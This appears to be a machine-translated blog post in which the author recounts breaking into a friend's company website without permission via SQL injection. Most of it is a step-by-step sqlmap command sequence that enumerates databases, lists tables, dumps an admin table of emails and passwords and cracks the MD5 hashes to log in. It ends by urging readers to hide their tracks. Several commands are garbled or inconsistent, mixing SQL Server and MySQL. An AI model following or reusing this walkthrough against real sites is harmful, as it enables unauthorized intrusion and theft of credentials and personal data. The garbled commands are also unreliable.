SQL injection-How do I step through an internet company

SQL injection-How do I step through an internet company

Recent research on web security-related knowledge, especially SQL injection classes. Exposed to some of the tools associated with SQL injection. Weekend at home idle bored, want to take the things that usually learn to attack a little partner around the company, see can not succeed. Don't try not to know, a try also true TM succeeded, heart some small excitement, special here to write a blog, to record how I step by step to break the internet company.

"Description of the crime tool"

(1) AppScan penetration Scanning Tool

AppScan is one of the most widely used tools on the Web application penetration Test stage. It is a desktop application that helps professional security personnel perform Web application Automation vulnerability assessments.

(2) Sqlmap penetration test Tool

SQLMAP is an automated SQL injection tool whose primary function is to scan, discover, and exploit the SQL injection vulnerability of a given URL.

"Details of the crime are as follows"

First use the AppScan tool, scan the website of www.xxx.com Internet company, scan the result as follows:

In these 56 security questions, find the link you're interested in, such as this one:

Http://www.xxx.com/system/cms/show?id=1

Why do we have to pick out this one? Because it is typical for SQL injection, the following popular SQL injection techniques. First use the following statement to determine if the site has an injection point:

Http://192.168.16.128/news.php?id=1 Original website

Http://192.168.16.128/news.php?id=1 ' ERROR or abnormal display

Http://192.168.16.128/news.php?id=1 and 1=1 error or abnormal display

Http://192.168.16.128/news.php?id=1 and 1=2 error or abnormal display

If there is an error, the injection point exists.

After judging the http://www.xxx.com/system/cms/show?id=1 the link exists injection point, then start our penetration test tool sqlmap, the next step of the injection work, the detailed process is as follows:

1) Re-confirm that the target injection point is available:

Python sqlmap.py-u http://www.xxx.com/system/cms/show?id=1

Parameters:

-U: Specify the injection point URL

Results:

Injection results show:

A. The parameter ID has a Boolean-based blind, that is, can be based on the return page to determine the conditions of the true and false injection.

B. The parameter ID has a time-based blind, which means that no information can be judged based on the content returned by the page, and the conditional statement is used to see if the time delay statement is executed (that is, if the page return time is increased).

C. The database type is: MYSQL 5.0.12

2) Bauku all databases:

A single command exposes all database names in the SQL Server command as follows:

http://www.xxx.com/system/cms/show?id=1  --dbs

Parameters:

--dbs: DBS has two bars in front of it, listing all databases.

Results:

The results show that SQL Server contains 3 databases that are available.

3) Get the currently used database

http://www.xxx.com/system/cms/show?id=1 --current-db

Parameters:

--current-db: The database that is currently in use.

Results:

4) Get current database usage account

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --current-user

5) List all users of SQL Server

http://www.xxx.com/system/cms/show?id=1 --users 

6) Get the current user database account and password

http://www.xxx.com/system/cms/show?id=1 --passwords

The result shows that the user may not have permission to read the relevant system.

7) List the tables in the database

http://www.xxx.com/system/cms/show?id=1 -D xxx_store --tables  

Parameters:

-D: Specify the database name

--tables: List Tables

Results:

The results show a total of 69 tables.

8) List The fields in the table

http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin --columns

Parameters:

-D: Specify the database name

-T: Specify a table to list fields

--columns: Specify list fields

Results:

9) Storm Field contents

http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin -C "ag_id,email,id,mobile,name,password,status" --dump

Parameters:

-C: Specify the field to be burst

--dump: Export the results

If the field is too much, it takes a lot of time. You can specify the export of a specific range of field content, with the following command:

http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin -C "ag_id,email,id,mobile,name,password,status" --start 1 --stop 10 --dump

Parameters:

--start: Specify the start line

--stop: Specifies the end of the line

The meaning of this command is to export the data contents of rows 1th through 10th in the table Mall_admin in the database Xxx_store in the About field (Ag_id,email,id,mobile,name,password,status).

The results are as follows:

Through, we can see the user information in the admin table. We will password the field through MD5 decryption, you can get the hash of the original password, through the user name and password, we can login to the site.

So far, we have successfully invaded the backstage of a company and got the relevant data. But to remind you here: Successful invasion is only half the success, and the most important half is to wipe your butt clean, not let others find you!

SQL injection-How did I step through an internet company